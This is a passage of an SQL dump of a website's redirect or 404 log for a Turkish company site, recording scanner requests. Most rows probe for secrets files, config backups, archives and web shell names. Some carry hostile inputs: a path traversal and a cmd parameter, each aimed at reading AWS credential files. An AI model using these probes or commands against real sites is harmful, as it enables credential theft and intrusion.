00:00:00',301),(39542,'https://3s-technologies.com.tr/tr/.env.ci',NULL,'','',7,0,'2025-04-07 20:58:15','0000-00-00 00:00:00',301),(39543,'https://3s-technologies.com.tr/tr/dev.env',NULL,'','',1,0,'2025-04-07 20:58:15','0000-00-00 00:00:00',301),(39544,'https://3s-technologies.com.tr/tr/local.env',NULL,'','',1,0,'2025-04-07 20:58:16','0000-00-00 00:00:00',301),(39545,'https://3s-technologies.com.tr/tr/prod.env',NULL,'','',1,0,'2025-04-07 20:58:17','0000-00-00 00:00:00',301),(39546,'https://3s-technologies.com.tr/tr/.prod.env',NULL,'','',1,0,'2025-04-07 20:58:18','0000-00-00 00:00:00',301),(39547,'https://3s-technologies.com.tr/tr/env.local',NULL,'','',1,0,'2025-04-07 20:58:19','0000-00-00 00:00:00',301),(39548,'https://3s-technologies.com.tr/tr/bin/.devenv',NULL,'','',1,0,'2025-04-07 20:58:21','0000-00-00 00:00:00',301),(39549,'https://3s-technologies.com.tr/tr/firefly-iii.env',NULL,'','',1,0,'2025-04-07 20:58:27','0000-00-00 00:00:00',301),(39550,'https://3s-technologies.com.tr/tr/docker.env',NULL,'','',1,0,'2025-04-07 20:58:28','0000-00-00 00:00:00',301),(39551,'https://3s-technologies.com.tr/tr/installable.env',NULL,'','',1,0,'2025-04-07 20:58:29','0000-00-00 00:00:00',301),(39552,'https://3s-technologies.com.tr/tr/env.dev',NULL,'','',1,0,'2025-04-07 20:58:29','0000-00-00 00:00:00',301),(39553,'https://3s-technologies.com.tr/tr/switchboard.env',NULL,'','',1,0,'2025-04-07 20:58:30','0000-00-00 00:00:00',301),(39554,'https://3s-technologies.com.tr/tr/backend/.env.example',NULL,'','',1,0,'2025-04-07 20:58:31','0000-00-00 00:00:00',301),(39555,'https://3s-technologies.com.tr/tr/frontend/.env',NULL,'','',7,0,'2025-04-07 20:58:31','0000-00-00 00:00:00',301),(39556,'https://3s-technologies.com.tr/tr/ssc.env',NULL,'','',1,0,'2025-04-07 20:58:32','0000-00-00 00:00:00',301),(39557,'https://3s-technologies.com.tr/tr/src/env/.env.dev',NULL,'','',1,0,'2025-04-07 20:58:33','0000-00-00 00:00:00',301),(39558,'https://3s-technologies.com.tr/tr/env/.env.dev',NULL,'','',1,0,'2025-04-07 20:58:34','0000-00-00 00:00:00',301),(39559,'https://3s-technologies.com.tr/tr/new.env',NULL,'','',1,0,'2025-04-07 20:58:34','0000-00-00 00:00:00',301),(39560,'https://3s-technologies.com.tr/tr/api/example.env',NULL,'','',1,0,'2025-04-07 20:58:36','0000-00-00 00:00:00',301),(39561,'http://3s-technologies.com.tr/tr/www.zip',NULL,'','',3,0,'2025-04-08 00:55:27','0000-00-00 00:00:00',301),(39562,'http://3s-technologies.com.tr/en/nope.php',NULL,'','',1,0,'2025-04-08 06:38:35','0000-00-00 00:00:00',301),(39563,'https://3s-technologies.com.tr/tr/roundcube',NULL,'','',1,0,'2025-04-10 21:25:08','0000-00-00 00:00:00',301),(39564,'https://3s-technologies.com.tr/tr/mail',NULL,'','',1,0,'2025-04-10 21:25:11','0000-00-00 00:00:00',301),(39565,'https://mail.3s-technologies.com.tr/tr/roundcube',NULL,'','',1,0,'2025-04-10 21:25:14','0000-00-00 00:00:00',301),(39566,'https://mail.3s-technologies.com.tr/tr/mail',NULL,'','',1,0,'2025-04-10 21:25:16','0000-00-00 00:00:00',301),(39567,'https://3s-technologies.com.tr/tr/tinyfilemanager.php',NULL,'https://3s-technologies.com.tr/tinyfilemanager.php','',2,0,'2025-04-11 04:01:11','0000-00-00 00:00:00',301),(39568,'https://3s-technologies.com.tr/tr/filemanager.php',NULL,'https://3s-technologies.com.tr/filemanager.php','',1,0,'2025-04-11 04:01:14','0000-00-00 00:00:00',301),(39569,'http://3s-technologies.com.tr/tr/web.tar.gz',NULL,'','',1,0,'2025-04-11 05:59:01','0000-00-00 00:00:00',301),(39570,'http://3s-technologies.com.tr/tr/www.tar.gz',NULL,'','',1,0,'2025-04-11 05:59:02','0000-00-00 00:00:00',301),(39571,'http://3s-technologies.com.tr/tr/archive.tar.gz',NULL,'','',2,0,'2025-04-11 05:59:02','0000-00-00 00:00:00',301),(39572,'http://3s-technologies.com.tr/tr/public.tar.gz',NULL,'','',1,0,'2025-04-11 06:00:21','0000-00-00 00:00:00',301),(39573,'http://3s-technologies.com.tr/tr/blog.tar.gz',NULL,'','',1,0,'2025-04-11 06:00:21','0000-00-00 00:00:00',301),(39574,'http://3s-technologies.com.tr/tr/wp.tar.gz',NULL,'','',1,0,'2025-04-11 06:00:22','0000-00-00 00:00:00',301),(39575,'http://3s-technologies.com.tr/tr/files.tar.gz',NULL,'','',1,0,'2025-04-11 06:00:23','0000-00-00 00:00:00',301),(39576,'http://3s-technologies.com.tr/tr/media/system/js/validate.js.map',NULL,'','',1,0,'2025-04-11 11:52:28','0000-00-00 00:00:00',301),(39577,'http://3s-technologies.com.tr/tr/media/system/js/tabs.js.map',NULL,'','',1,0,'2025-04-11 11:56:33','0000-00-00 00:00:00',301),(39578,'http://3s-technologies.com.tr/tr/media/system/js/punycode.js.map',NULL,'','',1,0,'2025-04-11 11:57:37','0000-00-00 00:00:00',301),(39579,'http://3s-technologies.com.tr/tr/media/system/js/keepalive.js.map',NULL,'','',1,0,'2025-04-11 11:57:44','0000-00-00 00:00:00',301),(39580,'http://3s-technologies.com.tr/tr/media/plugin_googlemap3/site/googleearthv3/googleearth.js.map',NULL,'','',1,0,'2025-04-11 13:28:10','0000-00-00 00:00:00',301),(39581,'http://3s-technologies.com.tr/tr/media/plugin_googlemap3/site/googlemaps/googlemapsv3.js.map',NULL,'','',1,0,'2025-04-11 13:30:09','0000-00-00 00:00:00',301),(39582,'http://3s-technologies.com.tr/tr/media/plg_captcha_recaptcha/js/recaptcha.min.js.map',NULL,'','',1,0,'2025-04-11 13:32:15','0000-00-00 00:00:00',301),(39583,'http://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js.map',NULL,'','',1,0,'2025-04-11 15:21:16','0000-00-00 00:00:00',301),(39584,'https://3s-technologies.com.tr/tr/wp-config.php~',NULL,'https://3s-technologies.com.tr/wp-config.php~','',2,0,'2025-04-12 01:02:55','0000-00-00 00:00:00',301),(39585,'https://3s-technologies.com.tr/tr/wp-config.php.old',NULL,'https://3s-technologies.com.tr/wp-config.php.old','',9,0,'2025-04-12 01:03:01','0000-00-00 00:00:00',301),(39586,'https://3s-technologies.com.tr/tr/wp-config.php.bak',NULL,'https://3s-technologies.com.tr/wp-config.php.bak','',3,0,'2025-04-12 01:03:10','0000-00-00 00:00:00',301),(39587,'https://3s-technologies.com.tr/tr/wp-config.php.swp',NULL,'https://3s-technologies.com.tr/wp-config.php.swp','',2,0,'2025-04-12 01:03:20','0000-00-00 00:00:00',301),(39588,'https://3s-technologies.com.tr/tr/wp-config.txt',NULL,'https://3s-technologies.com.tr/wp-config.txt','',1,0,'2025-04-12 04:38:03','0000-00-00 00:00:00',301),(39589,'http://3s-technologies.com.tr/tr/httpdocs.zip',NULL,'','',1,0,'2025-04-12 07:15:18','0000-00-00 00:00:00',301),(39590,'https://3s-technologies.com.tr/tr/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000',NULL,'','',2,0,'2025-04-13 20:28:29','0000-00-00 00:00:00',301),(39591,'https://3s-technologies.com.tr/tr/admin/config?cmd=cat+/root/.aws/credentials',NULL,'','',2,0,'2025-04-13 20:28:33','0000-00-00 00:00:00',301),(39592,'https://3s-technologies.com.tr/tr/plugins/ckeditor/upload.php',NULL,'https://3s-technologies.com.tr/plugins/ckeditor/upload.php','',1,0,'2025-04-14 06:36:29','0000-00-00 00:00:00',301),(39593,'https://3s-technologies.com.tr/tr/plugins/tinymce/upload.php',NULL,'https://3s-technologies.com.tr/plugins/tinymce/upload.php','',1,0,'2025-04-14 06:36:30','0000-00-00 00:00:00',301),(39594,'https://3s-technologies.com.tr/tr/plugins/ueditor/controller.php',NULL,'https://3s-technologies.com.tr/plugins/ueditor/controller.php','',1,0,'2025-04-14 06:36:32','0000-00-00 00:00:00',301),(39595,'http://3s-technologies.com.tr/en/cafydxeg.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-04-17 12:22:31','0000-00-00 00:00:00',301),(39596,'https://3s-technologies.com.tr/en/yapybjnf.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-04-17 12:22:34','0000-00-00 00:00:00',301),(39597,'https://3s-technologies.com.tr/en/adminfuns.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:30:48','0000-00-00 00:00:00',301),(39598,'https://3s-technologies.com.tr/en/tempfuns.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:30:49','0000-00-00 00:00:00',301),(39599,'https://3s-technologies.com.tr/en/thoms.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:30:51','0000-00-00 00:00:00',301),(39600,'https://3s-technologies.com.tr/en/termps.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:30:55','0000-00-00 00:00:00',301),(39601,'https://3s-technologies.com.tr/en/connects.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:30:58','0000-00-00 00:00:00',301),(39602,'https://3s-technologies.com.tr/en/filefuns.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:31:00','0000-00-00 00:00:00',301),(39603,'https://3s-technologies.com.tr/en/wp-content/termps.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:31:02','0000-00-00 00:00:00',301),(39604,'https://3s-technologies.com.tr/en/wp-admin/termps.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:31:03','0000-00-00 00:00:00',301),(39605,'https://3s-technologies.com.tr/en/wp-includes/termps.php',NULL,'https://www.google.com/','',2,0,'2025-04-17 12:31:04','0000-00-00 00:00:00',301),(39606,'https://3s-technologies.com.tr/tr/wp-content/plugins/instant-appointment/assets/css/bootstrap-icons.min.css',NULL,'','',1,0,'2025-04-17 13:56:05','0000-00-00 00:00:00',301),(39607,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-w2s_en_20_0101.pdf',NULL,'','',1,0,'2025-04-17 15:44:45','0000-00-00 00:00:00',301),(39608,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-vf_en_20_0101.pdf',NULL,'','',1,0,'2025-04-17 17:58:03','0000-00-00 00:00:00',301),(39609,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/am100_en_18_01015.pdf',NULL,'','',1,0,'2025-04-17 20:22:08','0000-00-00 00:00:00',301),(39610,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/lps-c_en_20_0101.pdf',NULL,'','',1,0,'2025-04-17 20:30:57','0000-00-00 00:00:00',301),(39611,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-w2_en_20_1001.pdf',NULL,'','',1,0,'2025-04-17 20:33:43','0000-00-00 00:00:00',301),(39612,'http://3s-technologies.com.tr/tr/wp-config.php.bk',NULL,'','',2,0,'2025-04-17 23:08:13','0000-00-00 00:00:00',301),(39613,'http://3s-technologies.com.tr/tr/wp-content/plugins/instant-appointment/assets/css/bootstrap-icons.min.css',NULL,'','',1,0,'2025-04-18 04:50:32','0000-00-00 00:00:00',301),(39614,'http://3s-technologies.com.tr/tr/sites/all/modules/elfinder/connectors/php/connector.php',NULL,'','',7,0,'2025-04-18 13:55:17','0000-00-00 00:00:00',301),(39615,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n?language=tr-tr',NULL,'','',1,0,'2025-04-18 14:52:10','0000-00-00 00:00:00',301),(39616,'https://3s-technologies.com.tr/tr/ftp-sync.json',NULL,'https://3s-technologies.com.tr/ftp-sync.json','',1,0,'2025-04-18 17:25:15','0000-00-00 00:00:00',301),(39617,'http://3s-technologies.com.tr/tr/xt.php',NULL,'','',2,0,'2025-04-19 05:28:42','0000-00-00 00:00:00',301),(39618,'http://3s-technologies.com.tr/tr/wp-admin/plugin-install.php',NULL,'','',1,0,'2025-04-19 05:28:45','0000-00-00 00:00:00',301),(39619,'http://3s-technologies.com.tr/tr/wp-admin/user/moon.php',NULL,'','',1,0,'2025-04-19 05:28:46','0000-00-00 00:00:00',301),(39620,'http://3s-technologies.com.tr/tr/images/js',NULL,'','',4,0,'2025-04-19 14:55:47','0000-00-00 00:00:00',301),(39621,'http://3s-technologies.com.tr/tr/images/stories/js',NULL,'','',4,0,'2025-04-19 14:55:48','0000-00-00 00:00:00',301),(39622,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/js',NULL,'','',4,0,'2025-04-19 14:55:50','0000-00-00 00:00:00',301),(39623,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/js',NULL,'','',4,0,'2025-04-19 14:55:51','0000-00-00 00:00:00',301),(39624,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name?language=tr-tr',NULL,'','',1,0,'2025-04-19 23:54:29','0000-00-00 00:00:00',301),(39625,'http://3s-technologies.com.tr/tr/wp-config',NULL,'','',2,0,'2025-04-20 08:47:21','0000-00-00 00:00:00',301),(39626,'http://3s-technologies.com.tr/tr/wp-config.old',NULL,'','',2,0,'2025-04-20 18:25:33','0000-00-00 00:00:00',301),(39627,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',1,0,'2025-04-21 14:32:02','0000-00-00 00:00:00',301),(39628,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-04-22 03:49:04','0000-00-00 00:00:00',301),(39629,'http://3s-technologies.com.tr/tr/wp-config.php.backup',NULL,'','',3,0,'2025-04-23 00:42:59','0000-00-00 00:00:00',301),(39630,'http://3s-technologies.com.tr/tr/wp-config.backup',NULL,'','',1,0,'2025-04-23 00:44:40','0000-00-00 00:00:00',301),(39631,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-04-23 17:46:45','0000-00-00 00:00:00',301),(39632,'http://3s-technologies.com.tr/en/kqnnuedv.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-04-23 19:27:53','0000-00-00 00:00:00',301),(39633,'https://3s-technologies.com.tr/en/izhcppzp.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-04-23 19:27:55','0000-00-00 00:00:00',301),(39634,'http://3s-technologies.com.tr/tr/sites/all/modules/elfinder/src/connectors/php/connector.php',NULL,'','',3,0,'2025-04-25 04:10:56','0000-00-00 00:00:00',301),(39635,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-42-detail',NULL,'','',1,0,'2025-04-25 16:20:42','0000-00-00 00:00:00',301),(39636,'http://3s-technologies.com.tr/tr/wp-content/db-cache.php',NULL,'','',47,0,'2025-04-25 17:01:35','0000-00-00 00:00:00',301),(39637,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyeleven/functions.php',NULL,'','',14,0,'2025-04-25 17:01:36','0000-00-00 00:00:00',301),(39638,'http://3s-technologies.com.tr/tr/wp-content/themes/oceanwp/functions.php',NULL,'','',14,0,'2025-04-25 17:01:36','0000-00-00 00:00:00',301),(39639,'http://3s-technologies.com.tr/tr/wp-content/themes/twentythirteen/functions.php',NULL,'','',14,0,'2025-04-25 17:01:37','0000-00-00 00:00:00',301),(39640,'http://3s-technologies.com.tr/tr/wp-content/themes/kadence/functions.php',NULL,'','',14,0,'2025-04-25 17:01:37','0000-00-00 00:00:00',301),(39641,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/functions.php',NULL,'','',14,0,'2025-04-25 17:01:38','0000-00-00 00:00:00',301),(39642,'http://3s-technologies.com.tr/tr/wp-config.php.bkp',NULL,'','',2,0,'2025-04-27 01:14:01','0000-00-00 00:00:00',301),(39643,'http://3s-technologies.com.tr/tr/wp-config.php.orig',NULL,'','',3,0,'2025-04-27 03:29:21','0000-00-00 00:00:00',301),(39644,'http://3s-technologies.com.tr/tr/wp-config.php.save',NULL,'','',3,0,'2025-04-27 03:29:54','0000-00-00 00:00:00',301),(39645,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/mi-300-detail?tmpl=component&print=1',NULL,'','',1,0,'2025-04-27 07:52:11','0000-00-00 00:00:00',301),(39646,'http://3s-technologies.com.tr/tr/.tmb/wso.php',NULL,'','',5,0,'2025-04-27 21:33:14','0000-00-00 00:00:00',301),(39647,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/inputs.php',NULL,'','',5,0,'2025-04-27 21:33:17','0000-00-00 00:00:00',301),(39648,'http://3s-technologies.com.tr/tr/.well-known/gelay.php',NULL,'','',5,0,'2025-04-27 21:33:17','0000-00-00 00:00:00',301),(39649,'http://3s-technologies.com.tr/tr/.well-known/wp-signup.php',NULL,'','',5,0,'2025-04-27 21:33:18','0000-00-00 00:00:00',301),(39650,'http://3s-technologies.com.tr/tr/.well-knownold/index.php',NULL,'','',5,0,'2025-04-27 21:33:18','0000-00-00 00:00:00',301),(39651,'http://3s-technologies.com.tr/tr/500.php',NULL,'','',5,0,'2025-04-27 21:33:28','0000-00-00 00:00:00',301),(39652,'http://3s-technologies.com.tr/tr/a1.php',NULL,'','',127,0,'2025-04-27 21:33:30','0000-00-00 00:00:00',301),(39653,'http://3s-technologies.com.tr/tr/administrator.php',NULL,'','',6,0,'2025-04-27 21:33:32','0000-00-00 00:00:00',301),(39654,'http://3s-technologies.com.tr/tr/alf4.php',NULL,'','',11,0,'2025-04-27 21:33:32','0000-00-00 00:00:00',301),(39655,'http://3s-technologies.com.tr/tr/alpha.php',NULL,'','',56,0,'2025-04-27 21:33:35','0000-00-00 00:00:00',301),(39656,'http://3s-technologies.com.tr/tr/assets/css/about.php',NULL,'','',6,0,'2025-04-27 21:33:36','0000-00-00 00:00:00',301),(39657,'http://3s-technologies.com.tr/tr/anonsec.php',NULL,'','',6,0,'2025-04-27 21:33:37','0000-00-00 00:00:00',301),(39658,'http://3s-technologies.com.tr/tr/asd.php',NULL,'','',52,0,'2025-04-27 21:33:37','0000-00-00 00:00:00',301),(39659,'http://3s-technologies.com.tr/tr/anons79.php',NULL,'','',6,0,'2025-04-27 21:33:37','0000-00-00 00:00:00',301),(39660,'http://3s-technologies.com.tr/tr/base.php',NULL,'','',6,0,'2025-04-27 21:33:39','0000-00-00 00:00:00',301),(39661,'http://3s-technologies.com.tr/tr/batm.php',NULL,'','',29,0,'2025-04-27 21:33:41','0000-00-00 00:00:00',301),(39662,'http://3s-technologies.com.tr/tr/black.php',NULL,'','',17,0,'2025-04-27 21:33:41','0000-00-00 00:00:00',301),(39663,'http://3s-technologies.com.tr/tr/blog/wp-includes/fonts/iqb.php',NULL,'','',6,0,'2025-04-27 21:33:41','0000-00-00 00:00:00',301),(39664,'http://3s-technologies.com.tr/tr/blog/wp-includes/fonts/dev.php',NULL,'','',6,0,'2025-04-27 21:33:41','0000-00-00 00:00:00',301),(39665,'http://3s-technologies.com.tr/tr/bypas.php',NULL,'','',6,0,'2025-04-27 21:33:43','0000-00-00 00:00:00',301),(39666,'http://3s-technologies.com.tr/tr/byp7.php',NULL,'','',7,0,'2025-04-27 21:33:43','0000-00-00 00:00:00',301),(39667,'http://3s-technologies.com.tr/tr/byp403.php',NULL,'','',7,0,'2025-04-27 21:33:44','0000-00-00 00:00:00',301),(39668,'http://3s-technologies.com.tr/tr/byps.php',NULL,'','',6,0,'2025-04-27 21:33:45','0000-00-00 00:00:00',301),(39669,'http://3s-technologies.com.tr/tr/con.php',NULL,'','',8,0,'2025-04-27 21:33:47','0000-00-00 00:00:00',301),(39670,'http://3s-technologies.com.tr/tr/compat.php',NULL,'','',6,0,'2025-04-27 21:33:47','0000-00-00 00:00:00',301),(39671,'http://3s-technologies.com.tr/tr/dev.php',NULL,'','',76,0,'2025-04-27 21:33:51','0000-00-00 00:00:00',301),(39672,'http://3s-technologies.com.tr/tr/eagle.php',NULL,'','',9,0,'2025-04-27 21:33:53','0000-00-00 00:00:00',301),(39673,'http://3s-technologies.com.tr/tr/exploit.php',NULL,'','',7,0,'2025-04-27 21:33:53','0000-00-00 00:00:00',301),(39674,'http://3s-technologies.com.tr/tr/fierza.php',NULL,'','',6,0,'2025-04-27 21:33:55','0000-00-00 00:00:00',301),(39675,'http://3s-technologies.com.tr/tr/fg.php',NULL,'','',6,0,'2025-04-27 21:33:56','0000-00-00 00:00:00',301),(39676,'http://3s-technologies.com.tr/tr/foxx.php',NULL,'','',6,0,'2025-04-27 21:33:58','0000-00-00 00:00:00',301),(39677,'http://3s-technologies.com.tr/tr/green.php',NULL,'','',21,0,'2025-04-27 21:34:02','0000-00-00 00:00:00',301),(39678,'http://3s-technologies.com.tr/tr/gelay.php',NULL,'','',74,0,'2025-04-27 21:34:02','0000-00-00 00:00:00',301),(39679,'http://3s-technologies.com.tr/tr/idx.php',NULL,'','',6,0,'2025-04-27 21:34:04','0000-00-00 00:00:00',301),(39680,'http://3s-technologies.com.tr/tr/id.php',NULL,'','',8,0,'2025-04-27 21:34:04','0000-00-00 00:00:00',301),(39681,'http://3s-technologies.com.tr/tr/images/inputs.php',NULL,'','',7,0,'2025-04-27 21:34:06','0000-00-00 00:00:00',301),(39682,'http://3s-technologies.com.tr/tr/iq.php',NULL,'','',6,0,'2025-04-27 21:34:07','0000-00-00 00:00:00',301),(39683,'http://3s-technologies.com.tr/tr/loader/ff.php?pass=shell',NULL,'','',6,0,'2025-04-27 21:34:12','0000-00-00 00:00:00',301),(39684,'http://3s-technologies.com.tr/tr/lx.php',NULL,'','',15,0,'2025-04-27 21:34:17','0000-00-00 00:00:00',301),(39685,'http://3s-technologies.com.tr/tr/mas.php',NULL,'','',6,0,'2025-04-27 21:34:21','0000-00-00 00:00:00',301),(39686,'http://3s-technologies.com.tr/tr/min.php',NULL,'','',12,0,'2025-04-27 21:34:21','0000-00-00 00:00:00',301),(39687,'http://3s-technologies.com.tr/tr/nn.php',NULL,'','',8,0,'2025-04-27 21:34:25','0000-00-00 00:00:00',301),(39688,'http://3s-technologies.com.tr/tr/priv.php',NULL,'','',22,0,'2025-04-27 21:34:27','0000-00-00 00:00:00',301),(39689,'http://3s-technologies.com.tr/tr/shl.php',NULL,'','',6,0,'2025-04-27 21:34:34','0000-00-00 00:00:00',301),(39690,'http://3s-technologies.com.tr/tr/seo.php',NULL,'','',29,0,'2025-04-27 21:34:34','0000-00-00 00:00:00',301),(39691,'http://3s-technologies.com.tr/tr/tes.php',NULL,'','',56,0,'2025-04-27 21:34:38','0000-00-00 00:00:00',301),(39692,'http://3s-technologies.com.tr/tr/sys.php',NULL,'','',47,0,'2025-04-27 21:34:39','0000-00-00 00:00:00',301),(39693,'http://3s-technologies.com.tr/tr/unknown.php',NULL,'','',6,0,'2025-04-27 21:34:41','0000-00-00 00:00:00',301),(39694,'http://3s-technologies.com.tr/tr/wp_cron.php',NULL,'','',7,0,'2025-04-27 21:34:45','0000-00-00 00:00:00',301),(39695,'http://3s-technologies.com.tr/tr/usr.php',NULL,'','',6,0,'2025-04-27 21:34:45','0000-00-00 00:00:00',301),(39696,'http://3s-technologies.com.tr/tr/wp-.php',NULL,'','',8,0,'2025-04-27 21:34:46','0000-00-00 00:00:00',301),(39697,'http://3s-technologies.com.tr/tr/wp-about.php',NULL,'','',6,0,'2025-04-27 21:34:47','0000-00-00 00:00:00',301),(39698,'http://3s-technologies.com.tr/tr/wp-access.php',NULL,'','',56,0,'2025-04-27 21:34:47','0000-00-00 00:00:00',301),(39699,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/zmfm.php',NULL,'','',7,0,'2025-04-27 21:34:49','0000-00-00 00:00:00',301),(39700,'http://3s-technologies.com.tr/tr/wp-admin/includes/atomlib.php',NULL,'','',6,0,'2025-04-27 21:34:53','0000-00-00 00:00:00',301),(39701,'http://3s-technologies.com.tr/tr/wp-conctent.php',NULL,'','',6,0,'2025-04-27 21:35:02','0000-00-00 00:00:00',301),(39702,'http://3s-technologies.com.tr/tr/wp-content/flame.php',NULL,'','',6,0,'2025-04-27 21:35:04','0000-00-00 00:00:00',301),(39703,'http://3s-technologies.com.tr/tr/wp-content/ixr/index.php',NULL,'','',7,0,'2025-04-27 21:35:06','0000-00-00 00:00:00',301),(39704,'http://3s-technologies.com.tr/tr/wp-content/inputs.php',NULL,'','',6,0,'2025-04-27 21:35:06','0000-00-00 00:00:00',301),(39705,'http://3s-technologies.com.tr/tr/wp-content/themes/inputs.php',NULL,'','',6,0,'2025-04-27 21:35:10','0000-00-00 00:00:00',301),(39706,'http://3s-technologies.com.tr/tr/wp-content/xleet.php',NULL,'','',6,0,'2025-04-27 21:35:12','0000-00-00 00:00:00',301),(39707,'http://3s-technologies.com.tr/tr/wp-defaul.php',NULL,'','',6,0,'2025-04-27 21:35:12','0000-00-00 00:00:00',301),(39708,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp-login.php',NULL,'','',8,0,'2025-04-27 21:35:15','0000-00-00 00:00:00',301),(39709,'http://3s-technologies.com.tr/tr/wp-includes.php',NULL,'','',9,0,'2025-04-27 21:35:15','0000-00-00 00:00:00',301),(39710,'http://3s-technologies.com.tr/tr/wp-includes/css/gelay.php',NULL,'','',6,0,'2025-04-27 21:35:17','0000-00-00 00:00:00',301),(39711,'http://3s-technologies.com.tr/tr/wp-includes/certificates/zmfm.php',NULL,'','',6,0,'2025-04-27 21:35:17','0000-00-00 00:00:00',301),(39712,'http://3s-technologies.com.tr/tr/wp-includes/cron.php',NULL,'','',6,0,'2025-04-27 21:35:17','0000-00-00 00:00:00',301),(39713,'http://3s-technologies.com.tr/tr/wp-includes/customize/zmfm.php',NULL,'','',10,0,'2025-04-27 21:35:18','0000-00-00 00:00:00',301),(39714,'http://3s-technologies.com.tr/tr/wp-includes/css/themes.php',NULL,'','',6,0,'2025-04-27 21:35:19','0000-00-00 00:00:00',301),(39715,'http://3s-technologies.com.tr/tr/wp-includes/fonts/iqb.php',NULL,'','',6,0,'2025-04-27 21:35:21','0000-00-00 00:00:00',301),(39716,'http://3s-technologies.com.tr/tr/wp-includes/fonts/iq.php',NULL,'','',6,0,'2025-04-27 21:35:21','0000-00-00 00:00:00',301),(39717,'http://3s-technologies.com.tr/tr/wp-includes/fonts/dev.php',NULL,'','',6,0,'2025-04-27 21:35:21','0000-00-00 00:00:00',301),(39718,'http://3s-technologies.com.tr/tr/wp-includes/default.php',NULL,'','',6,0,'2025-04-27 21:35:21','0000-00-00 00:00:00',301),(39719,'http://3s-technologies.com.tr/tr/wp-includes/ixr/index',NULL,'','',6,0,'2025-04-27 21:35:26','0000-00-00 00:00:00',301),(39720,'http://3s-technologies.com.tr/tr/wp-includes/library.php',NULL,'','',6,0,'2025-04-27 21:35:27','0000-00-00 00:00:00',301),(39721,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/zmfm.php',NULL,'','',6,0,'2025-04-27 21:35:27','0000-00-00 00:00:00',301),(39722,'http://3s-technologies.com.tr/tr/wp-includes/l10n.php',NULL,'','',7,0,'2025-04-27 21:35:28','0000-00-00 00:00:00',301),(39723,'http://3s-technologies.com.tr/tr/wp-includes/requests/auth/index.php',NULL,'','',7,0,'2025-04-27 21:35:29','0000-00-00 00:00:00',301),(39724,'http://3s-technologies.com.tr/tr/wp-includes/up.php',NULL,'','',6,0,'2025-04-27 21:35:33','0000-00-00 00:00:00',301),(39725,'http://3s-technologies.com.tr/tr/wp-includes/upload.php',NULL,'','',11,0,'2025-04-27 21:35:34','0000-00-00 00:00:00',301),(39726,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/zmfm.php',NULL,'','',7,0,'2025-04-27 21:35:34','0000-00-00 00:00:00',301),(39727,'http://3s-technologies.com.tr/tr/wp-includes/widgets/index.php',NULL,'','',20,0,'2025-04-27 21:35:35','0000-00-00 00:00:00',301),(39728,'http://3s-technologies.com.tr/tr/wp-includes/x.php',NULL,'','',10,0,'2025-04-27 21:35:36','0000-00-00 00:00:00',301),(39729,'http://3s-technologies.com.tr/tr/wp-includes/xmlrpc.php',NULL,'','',6,0,'2025-04-27 21:35:36','0000-00-00 00:00:00',301),(39730,'http://3s-technologies.com.tr/tr/wp/wp-includes/fonts/iqb.php',NULL,'','',6,0,'2025-04-27 21:35:40','0000-00-00 00:00:00',301),(39731,'http://3s-technologies.com.tr/tr/wp/wp-includes/fonts/dev.php',NULL,'','',6,0,'2025-04-27 21:35:40','0000-00-00 00:00:00',301),(39732,'http://3s-technologies.com.tr/tr/wp1.php',NULL,'','',30,0,'2025-04-27 21:35:40','0000-00-00 00:00:00',301),(39733,'http://3s-technologies.com.tr/tr/wpindex.php',NULL,'','',7,0,'2025-04-27 21:35:42','0000-00-00 00:00:00',301),(39734,'http://3s-technologies.com.tr/tr/wsanon.php',NULL,'','',7,0,'2025-04-27 21:35:42','0000-00-00 00:00:00',301),(39735,'http://3s-technologies.com.tr/tr/wso403.php',NULL,'','',16,0,'2025-04-27 21:35:42','0000-00-00 00:00:00',301),(39736,'http://3s-technologies.com.tr/tr/zero.php',NULL,'','',10,0,'2025-04-27 21:35:46','0000-00-00 00:00:00',301),(39737,'http://3s-technologies.com.tr/tr/zone.php?phpshell',NULL,'','',3,0,'2025-04-27 21:35:47','0000-00-00 00:00:00',301),(39738,'http://3s-technologies.com.tr/tr/file-manager/tinymce',NULL,'','',1,0,'2025-04-29 01:33:04','0000-00-00 